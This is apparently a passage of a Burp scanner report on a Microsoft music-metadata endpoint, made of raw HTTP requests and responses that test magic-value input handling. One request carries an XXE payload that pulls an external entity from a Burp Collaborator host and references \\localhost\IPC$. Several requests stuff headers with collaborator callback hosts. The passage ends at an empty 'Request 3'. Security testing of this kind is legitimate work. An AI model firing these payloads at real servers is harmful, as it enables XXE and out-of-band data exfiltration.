<METADATA><mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC,wrtqvatdzkq6evyi<a`'"${{\</mdqRequestID><ResponseCode>Error: Query String has a bad format.</ResponseCode><ResponseCode>Guid should contain 32 digits with 4 dashes (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx).</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC&pqybvgmr5=1&requestidqswyio=wrtqvag0uac1k8yi<a`'"${{\&msqyitjwk95=1&po7ma40=1 HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 250
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0" encoding="ISO-8859-1" standalone='no'?>
<!DOCTYPE foo [<!ENTITY % lnwi6 SYSTEM "http://9nxbn2ke808b1gjoi0pt6rhorfxbl190xrned22.burpcollaborator.net">%lnwi6; ]>
<!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>
<foo>&xxe;</foo>

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 24 Feb 2019 20:58:54 GMT
Connection: close

<METADATA><mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID><ResponseCode>Error: Parse Error</ResponseCode><ResponseCode>Expected DTD markup was not found. Line 1, position 1.</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

7. Interesting input handling: Magic value: null
Previous Next

There are 2 instances of this issue:

/cdinfo/getmdrcd.aspx [word XML parameter]
/cdinfo/getmdrcd.aspx [word XML parameter]

7.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

Magic value: undefined	undefined	uzdefined
word_count	96	3
whole_body_content	X	Y
content_length	6017	227
limited_body_content	X	Y

Magic value: null	null	nzll
word_count	96	3
whole_body_content	X	Y
content_length	6017	227
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=289352F3-177A-478F-B176-79BE3460A451&t3ym5e0=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ujh393or630w8cpwoml8b0uj6ac1669uy.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 2198
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://pkdyaypm7y1r97qrphm3cvve75dw712pr.burpcollaborator.net/ref
X-Real-IP: spoofed.ob3x1xglyxsq06hqggd23umdy44vy0uoj.burpcollaborator.net
Forwarded: for=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net;by=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net;host=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net
X-Forwarded-For: spoofed.8t2hjhy5ghaaiqzay0vmle4xgomfgke83.burpcollaborator.net
Contact: root@qmgzczrn9z3sb8ssrio4ewxf96fx928qx.burpcollaborator.net
From: root@jbys1sggyssl01hlgbdx3pm8yz4qyvyjn.burpcollaborator.net
True-Client-IP: spoofed.dxemnm2akmefmv3f25zrpj82ktqkkplda.burpcollaborator.net
X-Wap-Profile: http://ffyo5okc2owh4xlhk7ht7lq42v8m2r4ft.burpcollaborator.net/wap.xml
Client-ip: spoofed.aesj4jj71jvc3skcj2go6gpz1q7h1m5au.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>289352F3-177A-478F-B176-79BE3460A451</mdqRequestID>
<album>
<title>
<text>Collide (Live At State Theater) - Single</text>
<word>undefined</word>
<word>Live</word>
<word>At</word>
<word>State</word>
<word>Theater</word>
<word>Single</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
</album>
<track>
<title>
<text>Collide (Live At State Theater)</text>
<word>Collide</word>
<word>Live</word>
<word>At</word>
<word>State</word>
<word>Theater</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Collide (Live At State Theater) 1.m4a</filename>
<trackDuration>297610</trackDuration>
<bitrate>261936</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Collide (Live at State Theater)</text>
<word>Collide</word>
<word>Live</word>
<word>at</word>
<word>State</word>
<word>Theater</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Collide (Live at State Theater).m4a</filename>
<trackDuration>297610</trackDuration>
<bitrate>261936</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=289352F3-177A-478F-B176-79BE3460A451&i3yr6=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ujh393or630w8cpwoml8b0uj6ac1669uy.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 2198
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://pkdyaypm7y1r97qrphm3cvve75dw712pr.burpcollaborator.net/ref
X-Real-IP: spoofed.ob3x1xglyxsq06hqggd23umdy44vy0uoj.burpcollaborator.net
Forwarded: for=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net;by=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net;host=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net
X-Forwarded-For: spoofed.8t2hjhy5ghaaiqzay0vmle4xgomfgke83.burpcollaborator.net
Contact: root@qmgzczrn9z3sb8ssrio4ewxf96fx928qx.burpcollaborator.net
From: root@jbys1sggyssl01hlgbdx3pm8yz4qyvyjn.burpcollaborator.net
True-Client-IP: spoofed.dxemnm2akmefmv3f25zrpj82ktqkkplda.burpcollaborator.net
X-Wap-Profile: http://ffyo5okc2owh4xlhk7ht7lq42v8m2r4ft.burpcollaborator.net/wap.xml
Client-ip: spoofed.aesj4jj71jvc3skcj2go6gpz1q7h1m5au.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>289352F3-177A-478F-B176-79BE3460A451</mdqRequestID>
<album>
<title>
<text>Collide (Live At State Theater) - Single</text>
<word>zndefined</word>
<word>Live</word>
<word>At</word>
<word>State</word>
<word>Theater</word>
<word>Single</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
</album>
<track>
<title>
<text>Collide (Live At State Theater)</text>
<word>Collide</word>
<word>Live</word>
<word>At</word>
<word>State</word>
<word>Theater</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Collide (Live At State Theater) 1.m4a</filename>
<trackDuration>297610</trackDuration>
<bitrate>261936</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Collide (Live at State Theater)</text>
<word>Collide</word>
<word>Live</word>
<word>at</word>
<word>State</word>
<word>Theater</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Collide (Live at State Theater).m4a</filename>
<trackDuration>297610</trackDuration>
<bitrate>261936</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 2

Request 3

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=289352F3-177A-478F-B176-79BE3460A451&gdk4080=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ujh393or630w8cpwoml8b0uj6ac1669uy.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 2193
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://pkdyaypm7y1r97qrphm3cvve75dw712pr.burpcollaborator.net/ref
X-Real-IP: spoofed.ob3x1xglyxsq06hqggd23umdy44vy0uoj.burpcollaborator.net
Forwarded: for=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net;by=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net;host=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net
X-Forwarded-For: spoofed.8t2hjhy5ghaaiqzay0vmle4xgomfgke83.burpcollaborator.net
Contact: root@qmgzczrn9z3sb8ssrio4ewxf96fx928qx.burpcollaborator.net
From: root@jbys1sggyssl01hlgbdx3pm8yz4qyvyjn.burpcollaborator.net
True-Client-IP: spoofed.dxemnm2akmefmv3f25zrpj82ktqkkplda.burpcollaborator.net
X-Wap-Profile: http://ffyo5okc2owh4xlhk7ht7lq42v8m2r4ft.burpcollaborator.net/wap.xml
Client-ip: spoofed.aesj4jj71jvc3skcj2go6gpz1q7h1m5au.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>289352F3-177A-478F-B176-79BE3460A451</mdqRequestID>
<album>
<title>
<text>Collide (Live At State Theater) - Single</text>
<word>null</word>
<word>Live</word>
<word>At</word>
<word>State</word>
<word>Theater</word>
<word>Single</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
</album>
<track>
<title>
<text>Collide (Live At State Theater)</text>
<word>Collide</word>
<word>Live</word>
<word>At</word>
<word>State</word>
<word>Theater</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Collide (Live At State Theater) 1.m4a</filename>
<trackDuration>297610</trackDuration>
<bitrate>261936</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Collide (Live at State Theater)</text>
<word>Collide</word>
<word>Live</word>
<word>at</word>
<word>State</word>
<word>Theater</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Collide (Live at State Theater).m4a</filename>
<trackDuration>297610</trackDuration>
<bitrate>261936</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 3

Request 4

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=289352F3-177A-478F-B176-79BE3460A451&txhphq3rsy3=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ujh393or630w8cpwoml8b0uj6ac1669uy.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 2193
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://pkdyaypm7y1r97qrphm3cvve75dw712pr.burpcollaborator.net/ref
X-Real-IP: spoofed.ob3x1xglyxsq06hqggd23umdy44vy0uoj.burpcollaborator.net
Forwarded: for=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net;by=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net;host=spoofed.von4e4tsb45xdduxtnq9g1zkbbh2b78vx.burpcollaborator.net
X-Forwarded-For: spoofed.8t2hjhy5ghaaiqzay0vmle4xgomfgke83.burpcollaborator.net
Contact: root@qmgzczrn9z3sb8ssrio4ewxf96fx928qx.burpcollaborator.net
From: root@jbys1sggyssl01hlgbdx3pm8yz4qyvyjn.burpcollaborator.net
True-Client-IP: spoofed.dxemnm2akmefmv3f25zrpj82ktqkkplda.burpcollaborator.net
X-Wap-Profile: http://ffyo5okc2owh4xlhk7ht7lq42v8m2r4ft.burpcollaborator.net/wap.xml
Client-ip: spoofed.aesj4jj71jvc3skcj2go6gpz1q7h1m5au.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>289352F3-177A-478F-B176-79BE3460A451</mdqRequestID>
<album>
<title>
<text>Collide (Live At State Theater) - Single</text>
<word>zull</word>
<word>Live</word>
<word>At</word>
<word>State</word>
<word>Theater</word>
<word>Single</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
</album>
<track>
<title>
<text>Collide (Live At State Theater)</text>
<word>Collide</word>
<word>Live</word>
<word>At</word>
<word>State</word>
<word>Theater</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Collide (Live At State Theater) 1.m4a</filename>
<trackDuration>297610</trackDuration>
<bitrate>261936</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Collide (Live at State Theater)</text>
<word>Collide</word>
<word>Live</word>
<word>at</word>
<word>State</word>
<word>Theater</word>
</title>
<artist>
<text>Howie Day</text>
<word>Howie</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Collide (Live at State Theater).m4a</filename>
<trackDuration>297610</trackDuration>
<bitrate>261936</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 4

7.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

Magic value: undefined	undefined	uzdefined
word_count	131	3
whole_body_content	X	Y
content_length	7136	227
limited_body_content	X	Y

Magic value: null	null	nzll
word_count	131	3
whole_body_content	X	Y
content_length	7136	227
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=A5C8E268-11DA-4B01-B686-2CAF1B2B5541&hfgbp8=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@2hkb7bmz4by46kn4mujg98sr4ia9833rs.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1489
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://hteqjqyegqajizzjy9vvln46gxmokhn5c.burpcollaborator.net/ref
X-Real-IP: spoofed.z338t88wq8k1sh918r5dv5eoqfw6uzynn.burpcollaborator.net
Forwarded: for=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net;by=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net;host=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net
X-Forwarded-For: spoofed.sc8121hpz1tu1aiuhke64ynhz85z3tthi.burpcollaborator.net
Contact: root@m8vvyvdjvvpox4eodea00sjbv21tznqbf.burpcollaborator.net
From: root@p7xyxycmuyorw7drch93zvieu50wyqqef.burpcollaborator.net
True-Client-IP: spoofed.x426u69ur6lztfaz9p6bw3fmrdx4vyomd.burpcollaborator.net
X-Wap-Profile: http://rhc070mo40yt69ntmjj59xsg47ay8s2gr.burpcollaborator.net/wap.xml
Client-ip: spoofed.vrq4h4wse48xgdxxwnt9j12kebk2iwek3.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>A5C8E268-11DA-4B01-B686-2CAF1B2B5541</mdqRequestID>
<album>
<title>
<text>iTunes Originals - Jack Johnson</text>
<word>iTunes</word>
<word>undefined</word>
<word>Jack</word>
<word>Johnson</word>
</title>
<artist>
<text>Jack Johnson</text>
<word>Jack</word>
<word>Johnson</word>
</artist>
</album>
<track>
<title>
<text>A Pirate Looks at Forty (iTunes Originals Version)</text>
<word>A</word>
<word>Pirate</word>
<word>Looks</word>
<word>at</word>
<word>Forty</word>
<word>iTunes</word>
<word>Originals</word>
<word>Version</word>
</title>
<artist>
<text>Jack Johnson</text>
<word>Jack</word>
<word>Johnson</word>
</artist>
<trackNumber>10</trackNumber>
<filename>10 A Pirate Looks at Forty (iTunes O.m4a</filename>
<trackDuration>173429</trackDuration>
<bitrate>260384</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 01:16:05 GMT
Connection: close

<METADATA><mdqRequestID>A5C8E268-11DA-4B01-B686-2CAF1B2B5541</mdqRequestID><ResponseCode>Album Mode</ResponseCode><ResponseCode>Rare Word Supertoken</ResponseCode><MDR-CD><version>5.0</version><mdqRequestID>A5C8E268-11DA-4B01-B686-2CAF1B2B5541</mdqRequestID><WMCollectionID>0b714470-ccde-4d65-9e9a-4883263fe649</WMCollectionID><WMCollectionGroupID>0b714470-ccde-4d65-9e9a-4883263fe649</WMCollectionGroupID><uniqueFileID>AMGa_id=R 2426384</uniqueFileID><albumTitle>Jack Johnson & Friends: The Best of Kokua Festival</albumTitle><albumArtist>Jack Johnson</albumArtist><releaseDate>2012-04-17</releaseDate><label>Universal Republic</label><genre>Folk</genre><providerStyle>Pop/Rock</providerStyle><publisherRating>5</publisherRating><buyParams>providerName=AMG&albumID=0B714470-CCDE-4D65-9E9A-4883263FE649&a_id=R%20%202426384&album=Jack%20Johnson%20%26%20Friends:%20The%20Best%20of%20Kokua%20Festival&artistID=A456CD46-5D9D-4A11-A065-13A28FA30BCA&p_id=P%20%20%20468749&artist=Jack%20Johnson</buyParams><largeCoverParams>200/drS100/S122/S12272HTK7Z.jpg</largeCoverParams><smallCoverParams>075/drS100/S122/S12272HTK7Z.jpg</smallCoverParams><moreInfoParams>a_id=R%20%202426384</moreInfoParams><dataProvider>AMG</dataProvider><dataProviderParams>Provider=AMG</dataProviderParams><dataProviderLogo>Provider=AMG</dataProviderLogo><needIDs>0</needIDs><track><WMContentID>7ed41413-0380-48c7-b664-0fe3d71f6004</WMContentID><trackRequestID></trackRequestID><trackTitle>Better Together</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057381</uniqueFileID><trackNumber>1</trackNumber><trackPerformer>Jack Johnson</trackPerformer><trackComposer>Jack Johnson</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>f4af5daa-8214-4283-9c8f-51790370bbc6</WMContentID><trackRequestID></trackRequestID><trackTitle>Cry Cry Cry</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057380</uniqueFileID><trackNumber>2</trackNumber><trackPerformer>Jack Johnson; Ziggy Marley</trackPerformer><trackComposer>Jack Johnson; Ziggy Marley</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>02c54ee0-1a2e-4c0c-ae5e-daa5b78e9afb</WMContentID><trackRequestID>0</trackRequestID><trackTitle>A Pirate Looks at Forty</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057379</uniqueFileID><trackNumber>3</trackNumber><trackPerformer>Dave Matthews; Jack Johnson; Tim Reynolds</trackPerformer><trackComposer>Jimmy Buffett</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>47637200-5c3b-4329-a5ae-83a54f2f143e</WMContentID><trackRequestID></trackRequestID><trackTitle>Mudfootball</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057378</uniqueFileID><trackNumber>4</trackNumber><trackPerformer>Jack Johnson</trackPerformer><trackComposer>Jack Johnson</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>6ef63829-8d36-4b5d-9344-829b9279b86c</WMContentID><trackRequestID></trackRequestID><trackTitle>Constellations</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057377</uniqueFileID><trackNumber>5</trackNumber><trackPerformer>Jack Johnson</trackPerformer><trackComposer>Jack Johnson</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>c8a23f46-129c-43b8-9a2a-583f9392618f</WMContentID><trackRequestID></trackRequestID><trackTitle>Take It Easy</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057376</uniqueFileID><trackNumber>6</trackNumber><trackPerformer>Jack Johnson; Jackson Browne</trackPerformer><trackComposer>Glenn Frey; Jack Johnson</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>92a08435-ba38-4a1f-869b-d3a618d12b07</WMContentID><trackRequestID></trackRequestID><trackTitle>Island Style</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057375</uniqueFileID><trackNumber>7</trackNumber><trackPerformer>Jack Johnson; John Cruz</trackPerformer><trackComposer>John Cruz</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>0d7947e3-e26e-429f-90e6-b493e056c7c9</WMContentID><trackRequestID></trackRequestID><trackTitle>Breakdown</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057369</uniqueFileID><trackNumber>8</trackNumber><trackPerformer>Jack Johnson</trackPerformer><trackComposer>Dan Nakamura; Jack Johnson; Paul Huston</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>17a18372-95fa-4922-8860-bb52563a2387</WMContentID><trackRequestID></trackRequestID><trackTitle>Further on Down the Road</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057374</uniqueFileID><trackNumber>9</trackNumber><trackPerformer>Jack Johnson; Taj Mahal</trackPerformer><trackComposer>Taj Mahal</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>6f4b85b6-4ada-4cae-8711-fa1764237c8c</WMContentID><trackRequestID></trackRequestID><trackTitle>Welcome to Jamrock</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057373</uniqueFileID><trackNumber>10</trackNumber><trackPerformer>Damian Marley; Jack Johnson</trackPerformer><trackComposer>Damian Marley; Ini Kamoze; Robert Russell; Stephen Marley</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>bc5895be-163c-4637-8ec4-2859996ca64a</WMContentID><trackRequestID></trackRequestID><trackTitle>High Tide or Low Tide</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057372</uniqueFileID><trackNumber>11</trackNumber><trackPerformer>Ben Harper; Jack Johnson</trackPerformer><trackComposer>Bob Marley</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>324ea500-e3e0-46cc-9d23-94874447bf84</WMContentID><trackRequestID></trackRequestID><trackTitle>Blue Eyes Crying in the Rain</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057371</uniqueFileID><trackNumber>12</trackNumber><trackPerformer>Jack Johnson; Willie Nelson</trackPerformer><trackComposer>Fred Rose</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>b3f6a0fb-ae9b-4ed4-9aec-cab956bbae3d</WMContentID><trackRequestID></trackRequestID><trackTitle>I Shall Be Released</trackTitle><uniqueFileID>AMGp_id=P 468749;AMGt_id=T 26057370</uniqueFileID><trackNumber>13</trackNumber><trackPerformer>Eddie Vedder; Jack Johnson; Zach Gill</trackPerformer><trackComposer>Bob Dylan</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track></MDR-CD><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=A5C8E268-11DA-4B01-B686-2CAF1B2B5541&yxa52v8=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@2hkb7bmz4by46kn4mujg98sr4ia9833rs.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1489
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://hteqjqyegqajizzjy9vvln46gxmokhn5c.burpcollaborator.net/ref
X-Real-IP: spoofed.z338t88wq8k1sh918r5dv5eoqfw6uzynn.burpcollaborator.net
Forwarded: for=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net;by=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net;host=spoofed.8u3hkhz5hhbajq0az0wmme5xhonfl8qwf.burpcollaborator.net
X-Forwarded-For: spoofed.sc8121hpz1tu1aiuhke64ynhz85z3tthi.burpcollaborator.net
Contact: root@m8vvyvdjvvpox4eodea00sjbv21tznqbf.burpcollaborator.net
From: root@p7xyxycmuyorw7drch93zvieu50wyqqef.burpcollaborator.net
True-Client-IP: spoofed.x426u69ur6lztfaz9p6bw3fmrdx4vyomd.burpcollaborator.net
X-Wap-Profile: http://rhc070mo40yt69ntmjj59xsg47ay8s2gr.burpcollaborator.net/wap.xml
Client-ip: spoofed.vrq4h4wse48xgdxxwnt9j12kebk2iwek3.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>A5C8E268-11DA-4B01-B686-2CAF1B2B5541</mdqRequestID>
<album>
<title>
<text>iTunes Originals - Jack Johnson</text>
<word>iTunes</word>
<word>zndefined</word>
<word>Jack</word>
<word>Johnson</word>
</title>
<artist>
<text>Jack Johnson</text>
<word>Jack</word>
<word>Johnson</word>
</artist>
</album>
<track>
<title>
<text>A Pirate Looks at Forty (iTunes Originals Version)</text>
<word>A</word>
<word>Pirate</word>
<word>Looks</word>
<word>at</word>
<word>Forty</word>
<word>iTunes</word>
<word>Originals</word>
<word>Version</word>
</title>
<artist>
<text>Jack Johnson</text>
<word>Jack</word>
<word>Johnson</word>
</artist>
<trackNumber>10</trackNumber>
<filename>10 A Pirate Looks at Forty (iTunes O.m4a</filename>
<trackDuration>173429</trackDuration>
<bitrate>260384</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 2

Request 3

